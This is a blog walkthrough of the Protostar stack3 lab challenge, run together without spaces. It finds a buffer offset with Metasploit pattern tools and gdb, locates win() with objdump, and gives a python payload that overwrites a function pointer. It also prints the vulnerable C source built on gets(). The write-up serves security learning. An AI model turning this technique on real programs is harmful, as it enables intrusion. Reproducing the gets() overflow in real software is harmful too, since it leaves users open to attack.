Buffer Overflow Examples, Overwriting a function pointer

Another post where I overwrite a variable value which is used as a function pointer. (x32) Skiptoprimarynavigation Skiptocontent Skiptofooter 0xRick'sBlog About Categories Tags Togglemenu 0xRick Follow Somewherebetween1'sand0's HomePage Twitter Github BufferOverflowExamples,Overwritingafunctionpointer-protostarstack3 Introduction ./Stack3 Findingthesizeofthebuffer Findingthememoryaddressofthefunction Applyingtheexploit BufferOverflowExamples,Overwritingafunctionpointer-protostarstack3 Introduction HeyI’mbackagainwithanotherarticle,todayI’mgoingtosolveprotostarstack3butthistimeit’sgoingtobeabitdifferent,InthelasttwoarticlesIsolvedstack0,stack1andstack2andIusedthesourcecodeofthebinariestoidentifywherethebufferoverflowhappensandwhatexploittouse.Nowwithstack3wearegiventhesourcecodebutWearenotgoingtouseit,Insteadofthatwewillusesomepracticaltechniquestosolvethischallenge.Becauseinarealsituationwewon’thavethesourceoftheprogramright?Let’ssee Ifyouhaven’treadmypreviousarticlesaboutbufferoverflowIrecommendreadingthemfirst ./Stack3 Let’sfirstlookattheprogramandseewhatdoesitdo. Wedon’tseeanyoutputsoweshouldgiveitanargument.Weneedtoconfirmthattheprogramisvulnerabletoabufferoverflowsowecanpassanargumentof100charsandseewhathappens python-c"print'A'*100"|./stack3 Andweseeasegfaultwhichconfirmsthatabufferoverflowhappened,wealsoseethisline:“callingfunctionpointer,jumpingto0x41414141” Sonowwehaveanideaaboutwhat’shappeninghere,There’safunctionpointerthatexecutesafunctionbasedonthegivenmemoryaddressofthatfunction.Thatmemoryaddressisstoredinavariableandwecanoverwritethatvariablewhenweexceedthebuffer.Weseethatthefunctionpointerwascallingtheaddress0x41414141and0x41isthehexof“A”.Nowwehavetodotwothings.Thefirstthingistoknowwherethebufferoverflowhappens,Becauseherewehavegiventheprogramanargumentof100charsbutwedon’tknowexactlythesizeofthebuffer.Thesecondthingistofindthememoryaddressofthefunctionthatweneedtoexecute.Let’sseehowtodothat. Findingthesizeofthebuffer TomakethingseasierIcompiledtheprogramonmykaliboxtostarttestingthere. Metasploithastwoscriptscalledpattern_createandpattern_offset,youcanfindthemonkaliin/usr/share/metasploit-framework/tools/exploit pattern_createcreatsauniquestringofadefinedlengthsowewillcreateapatternof100chars. ./pattern_create.rb-l100 Nowlet’sruntheprogramingdb,I’musinggdb-peda Firstwesetabreakpointinmain. break*main Thismakestheprogrambreakafterthefirstinstructionofthefunctionmain() Thenweruntheprogram. Itstopsatthebreakpoint.Wedoctomakeitcontinuethenpassourargument Thesegfaulthappensandweseewhereithappened:0x63413163 Nowwewillusepattern_offsettoknowwhatisthelocationof0x63413163 ./pattern_offset-l100-q63413163 Andwegetexactmatchatoffset64,Thismeansthatthebuffersizeis64charsandafterthattheoverflowhappens. Findingthememoryaddressofthefunction Ifwedoinfofunctionsfromgdbitwilllistallthefunctionsandtheirmemoryaddresses,wecanalsodothatwithobjdump.Butwhatisthefunctionwe’relookingfor? infofunctions Weseealotoffunctionsbutthemostinterestingoneiscalled“win”,buttheaddressonmykaliboxwillbedifferentfromtheaddressontheprotostarmachine.Wewillreturntoprotostaranduseobjdumptofindit. objdump-dstack3 Andwegottheaddress0x08048424 Applyingtheexploit Nowwecaneasilybuildourexploit,weknowthatthebufferis64charsafterthatwecanpasstheaddressofthefunctionandthefunctionpointerwillexecuteit. python-c"print'A'*64+'\x24\x84\x04\x08'"|./stack3 Andwegettheoutput“codeflowchangedsuccessfully” Wesolveditwithoutthesource,nowlet’slookatthesource #include #include #include #include voidwin() { printf("codeflowsuccessfullychanged\n"); } intmain(intargc,char**argv) { volatileint(*fp)(); charbuffer[64]; fp=0; gets(buffer); if(fp){ printf("callingfunctionpointer,jumpingto0x%08x\n",fp); fp(); } } Weseefunctionwin()isdefinedatthetopthenafterthatthefunctionmain()whichdefinesthefunctionpointer,setsabufferof64charstoit,thensetsitsvalueto0.Afterthatittakesourargumentandstoresitinthebuffer.Thelastthingisanifstatementthatchecksifthefunctionpointervalueischangedfrom0thenitcallstheaddressofthatnewvalue. That’sit,Feedbackisappreciated! Don’tforgettoreadthepreviousarticles,Tweetaboutthearticleifyoulikedit,followontwitter@Ahm3d_H3sham Thanksforreading. PreviousBinaryExploitationarticle:BufferOverflowExamples,Overwritingavariablevalueonthestack-ProtostarStack1,Stack2 NextBinaryExploitationarticle:BufferOverflowExamples,Takingcontroloftheinstructionpointer-protostarstack4 Previous Next